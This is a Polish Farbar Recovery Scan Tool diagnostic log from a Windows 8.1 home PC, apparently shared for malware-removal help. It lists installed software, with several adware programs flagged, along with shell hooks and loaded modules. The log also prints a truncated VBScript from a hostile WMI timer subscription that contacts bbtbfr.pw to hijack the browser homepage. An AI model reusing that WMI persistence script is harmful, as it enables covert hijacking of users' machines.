Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 17-01-2021
Uruchomiony przez Byaku (17-01-2021 14:00:20)
Uruchomiony z C:\Users\Byaku\Downloads
Windows 8.1 (Update) (X64) (2015-03-03 17:17:35)
Tryb startu: Normal
==========================================================

==================== Konta użytkowników: =============================

Administrator (S-1-5-21-2709180964-3026329352-173763364-500 - Administrator - Disabled)
Byaku (S-1-5-21-2709180964-3026329352-173763364-1001 - Administrator - Enabled) => C:\Users\Byaku
Gość (S-1-5-21-2709180964-3026329352-173763364-501 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Panda Dome (Enabled - Up to date) {CF440CD9-5435-10B1-04E0-7768B6F10320}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Panda Dome (Enabled - Up to date) {7425ED3D-720F-1F3F-3E50-4C1ACD76499D}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version: - )
Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 5.2.1.441 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CS6 (HKLM-x32\...\{4869414E-7AEA-4C8E-BE1C-8D40977FD517}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2018 (HKLM-x32\...\AME_12_1_1) (Version: 12.1.1 - Adobe Systems Incorporated)
Aktualizacje NVIDIA 16.13.56 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 16.13.56 - NVIDIA Corporation) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\{66DC436D-02B4-48F5-AF30-01EDED35168F}) (Version: 20.2.1245.53580 - Alcor Micro Corp.) Hidden
Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 20.2.1245.53580 - Alcor Micro Corp.)
AlphaGo (HKLM-x32\...\{118B6258-BF13-47C9-8D46-B2A349196B5D}) (Version: 1.0.0 - Default Company Name) <==== UWAGA
AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name) <==== UWAGA
AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name) <==== UWAGA
AlphaGo (HKLM-x32\...\{B20B3A3C-91E3-4326-8A0F-B3C012574F8C}) (Version: 1.1.2 - Default Company Name) <==== UWAGA
AlphaGo (HKLM-x32\...\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}) (Version: 1.2.5 - AlphaGo) <==== UWAGA
amuleC (HKLM-x32\...\{19539992-061C-4E8B-9053-07B175303AF4}) (Version: 1.0.1 - amuleC) <==== UWAGA
Animate (HKLM\...\{F0857D72-1EA4-4296-ABB3-A92E70528206}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
BikaQ Rss (HKLM-x32\...\{3678D164-84DB-4F73-AFD6-916342E10764}) (Version: 3.0.17 - BikaQ) <==== UWAGA
BikaQ Rss Reader (HKLM-x32\...\{56B2B28A-E663-4D28-84A3-3846068A7D63}) (Version: 1.0.0 - BikaQ) <==== UWAGA
Brother MFL-Pro Suite DCP-195C (HKLM-x32\...\{6BF66AED-3EA4-4106-B240-5CE96C9B76B0}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
calibre (HKLM-x32\...\{6C358B17-1145-46D8-85E0-57FFFCA93BFC}) (Version: 2.56.0 - Kovid Goyal) Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.3.2.2 - Dolby Laboratories Inc) Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc) DPower version 1.0 (HKLM-x32\...\DPower_is1) (Version: 1.0 - WeMonetize) <==== UWAGA Energy Manager (HKLM-x32\...\{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.27 - Lenovo) Hidden Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.27 - Lenovo) FontForge (wersja 31-07-2017) (HKLM-x32\...\{56748B9C-19AE-4689-B8C5-5A45AE0A993A}_is1) (Version: 31-07-2017 - FontForgeBuilds) FontLab Studio 5 (HKLM-x32\...\{F6E36639-10C8-4FAD-AF1F-E84D5B6653D1}) (Version: 5.0.4 - FontLab) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.145 - Google Inc.) 
Hidden IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6490.0 - IDT) Infonaut 1.10.0.13 (HKLM-x32\...\Infonaut_1.10.0.13) (Version: 1.10.0.13 - Infonaut) <==== UWAGA Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1013 - Intel Corporation) Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.14.1724 - Intel Corporation) Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology (HKLM\...\{444400C1-6BDF-4FD1-1306-148929CC1385}) (Version: 3.0.1306.0342 - Intel Corporation) istartsurf uninstall (HKLM-x32\...\istartsurf uninstall) (Version: - istartsurf) Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - 
Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.23.27820 (HKLM-x32\...\{852adda4-4c78-4a38-b583-c0b360a329d6}) (Version: 14.23.27820.0 - Microsoft Corporation) Microsoft Visual C++ 
2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation) My Web Shield (HKLM\...\mweshield) (Version: 3.0 - My Web Shield) <==== UWAGA NVIDIA GeForce Experience 2.1.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.3 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation) NVIDIA Sterownik graficzny 344.48 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 344.48 - NVIDIA Corporation) Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (HKLM\...\{E237254B-36A1-3D27-815E-B37C13BE0796}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (HKLM-x32\...\{03077B58-6ACF-32CA-B42A-EAA458C295A1}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Pakiet sterowników systemu Windows - Intel (NETwNe64) net (02/21/2013 15.6.1.6) (HKLM\...\8D9612122FB122E74AABD8B727C58E14ED36030A) (Version: 02/21/2013 15.6.1.6 - Intel) Pakiet sterowników systemu Windows - Intel (NETwNs64) net (01/22/2012 14.3.2.1) (HKLM\...\CD88F0FADE1395C9F91302912FD35B13CF75C196) (Version: 01/22/2012 14.3.2.1 - Intel) Pakiet sterowników systemu Windows - Intel (NETwNs64) net (01/23/2013 15.4.1.1) (HKLM\...\EDB3AFE3A78039CF2ECCA4716CFA00C670559BEA) (Version: 01/23/2013 15.4.1.1 - Intel) Pakiet sterowników systemu Windows - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) 
(HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo) Pakiet sterowników systemu Windows - Lenovo (WUDFRd) LenovoVhid (06/19/2012 10.13.29.733) (HKLM\...\8A223E56FB1ED4F697B54E5BF96F1EB63B512684) (Version: 06/19/2012 10.13.29.733 - Lenovo) Panda Devices Agent (HKLM-x32\...\{DB0164A2-ADE9-4FEE-B080-D506BDD6427F}) (Version: 1.08.09 - Panda Security) Hidden Panda Devices Agent (HKLM-x32\...\Panda Devices Agent) (Version: 1.03.09 - Panda Security) Hidden Panda Dome (HKLM\...\{10EDA2C8-03AB-4C27-BDC4-39143A81B12F}) (Version: 11.12.30 - Panda Security) Hidden Panda Dome (HKLM-x32\...\Panda Universal Agent Endpoint) (Version: 20.00.00.0001 - Panda Security) Panel sterowania NVIDIA 344.48 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 344.48 - NVIDIA Corporation) Hidden PaperPort Image Printer 64-bit (HKLM\...\{ABA4FAF1-6389-45F9-92CE-3914A4E5C471}) (Version: 1.00.0000 - Nuance Communications, Inc.) PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden Pentablet wersja 1.6.4.200810 (HKLM\...\{5DAB8C1A-6D8E-467D-BE62-AC13087AA950}_is1) (Version: 1.6.4.200810 - ) PhotoScape (HKLM-x32\...\PhotoScape) (Version: - ) Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PLK) (Version: 10.0.50903 - Microsoft Corporation) Qualcomm Atheros Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.21 - Qualcomm Atheros Inc.) 
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft) SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 3.1.1000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 16.13.56 - NVIDIA Corporation) Hidden VLC media player (HKLM\...\VLC media player) (Version: 2.2.0 - VideoLAN) YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (HKLM\...\{25FB53C5-BE4C-3B6C-A0C9-D49A39227E1E}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (HKLM-x32\...\{68DC347D-C1C0-3DE2-A53E-CCC71DA53E57}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Packages: ========= Bing Food & Drink -> C:\Program Files\WindowsApps\Microsoft.BingFoodAndDrink_3.0.1.177_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Bing Health & Fitness -> C:\Program Files\WindowsApps\Microsoft.BingHealthAndFitness_3.0.1.176_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Games -> C:\Program Files\WindowsApps\Microsoft.XboxLIVEGames_2.0.20.0_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] News -> C:\Program Files\WindowsApps\Microsoft.BingNews_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Skype -> C:\Program Files\WindowsApps\Microsoft.SkypeApp_2.0.0.5011_x86__kzf8qxf38zg5c [2020-05-28] (Skype) [MS Ad] Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Travel -> C:\Program 
Files\WindowsApps\Microsoft.BingTravel_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Video -> C:\Program Files\WindowsApps\Microsoft.ZuneVideo_2.2.41.0_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_3.0.1.174_x64__8wekyb3d8bbwe [2020-05-28] (Microsoft Corporation) [MS Ad] ==================== Niestandardowe rejestracje CLSID (filtrowane): ============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc -> Google Inc.) <==== UWAGA CustomCLSID: HKU\S-1-5-21-2709180964-3026329352-173763364-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems) ShellExecuteHooks: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [6671064 2013-12-18] (Microsoft Corporation -> Microsoft Corporation) ShellExecuteHooks: Brak nazwy - {E725373E-AA7E-11E6-9275-64006A5CFC23} - C:\Users\Byaku\AppData\Roaming\Stergerswefepy\Wrerghclltion.dll -> Brak pliku <==== UWAGA ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [4171480 2013-12-18] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. 
-> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers1: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers1: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) 
ContextMenuHandlers2: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers4: [KuaiZipShlExt] -> {6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E} => -> Brak pliku ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll -> Brak pliku ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2014-09-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-10-16] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers5: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2020-11-25] (Adobe Inc. -> ) ContextMenuHandlers6: [UAContextMenu] -> {A9B8E64D-3F7E-4D32-8FC9-E391DEE67D75} => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAShell.dll [2019-06-18] (Panda Security S.L. -> Panda Security, S.L.) ==================== Codecs (filtrowane) ==================== ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) 
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"ASEC\"",Filter="\\.\root\subscription:__EventFilter.Name=\"EventFilter sethomePage2\":: <==== UWAGA
WMI:subscription\__TimerInstruction->SethomePage Interval Timer:: <==== UWAGA
WMI:subscription\__IntervalTimerInstruction->SethomePage Interval Timer:: <==== UWAGA
WMI:subscription\__EventFilter->EventFilter sethomePage2::[Query => Select * From __timerevent Where TimerId = "SethomePage Interval Timer"] <==== UWAGA
WMI:subscription\ActiveScriptEventConsumer->ASEC::[ScriptText => Dim xmlHttp:Dim homePageUrl:Set xmlHttp = CreateObject("MSXML2.XMLHTTP"):xmlHttp.open "GET", "http://bbtbfr.pw/GetHPHost?"&Timer(), False:On Error Resume Next:xmlHttp.send:if xmlHttp.status = 200 then:homePageUrl= xmlHttp.responseText:end if:Dim objFS:Set objFS = CreateObject("Scripting.FileSystemOb (dane wartości zawierają 2410 znaków więcej).] <==== UWAGA
Shortcut: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Kinga - Chrome.lnk -> C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9 ()
ShortcutWithArgument: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}";
ShortcutWithArgument: C:\Users\Byaku\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d249d9ddd424b688\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default

==================== Załadowane moduły (filtrowane) =============

2015-03-09 16:39 - 2009-02-27 16:38 - 000139264 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-04-29 07:12 - 2016-04-29 07:12 - 000037888 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre-launcher.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000224768 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_lcms_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001206272 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_magick_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000064000 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libexslt.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 001069568 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libxml2.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000176128 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\libxslt.dll 2014-05-03 22:25 - 2014-05-03 22:25 - 000110080 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\pywintypes27.dll 2014-12-10 11:23 - 2014-12-10 11:23 - 000426496 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\sqlite3.dll 2016-04-29 07:11 - 2016-04-29 07:11 - 000043520 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\magick.pyd 2016-04-29 07:12 - 2016-04-29 07:12 - 000057344 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\progress_indicator.pyd 2016-04-29 07:12 - 2016-04-29 07:12 - 000035840 ____R () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\plugins2\wpd.pyd 2015-03-09 16:40 - 2012-06-05 15:59 - 000025299 ____R (Brother Industries, Ltd) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\brlm03a.dll 2015-03-09 16:40 - 2008-11-26 10:25 - 000208896 ____N (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrFirmUpdateCheck.dll 2015-03-09 16:40 - 2008-08-18 18:27 - 000122880 ____N (Brother Industries, Ltd.) 
[Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\brlmw03a.dll 2015-03-09 16:40 - 2011-04-11 13:10 - 000163840 ____N (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BRMFCWNDPol.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000050176 ____R (Carlo Baldassi) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_lqr_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000449536 ____R (David Turner, Robert Wilhelm, & Werner Lemberg) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\CORE_RL_ttf_.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004041728 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Core.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 004427264 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Gui.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000553472 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Multimedia.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000084992 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5MultimediaWidgets.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000820224 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Network.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000268288 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5OpenGL.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000166400 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5Positioning.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 000263680 ____R (Digia Plc and/or its subsidiary(-ies)) [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\DLLs\Qt5PrintSupport.dll 2016-04-29 07:15 - 2016-04-29 07:15 - 
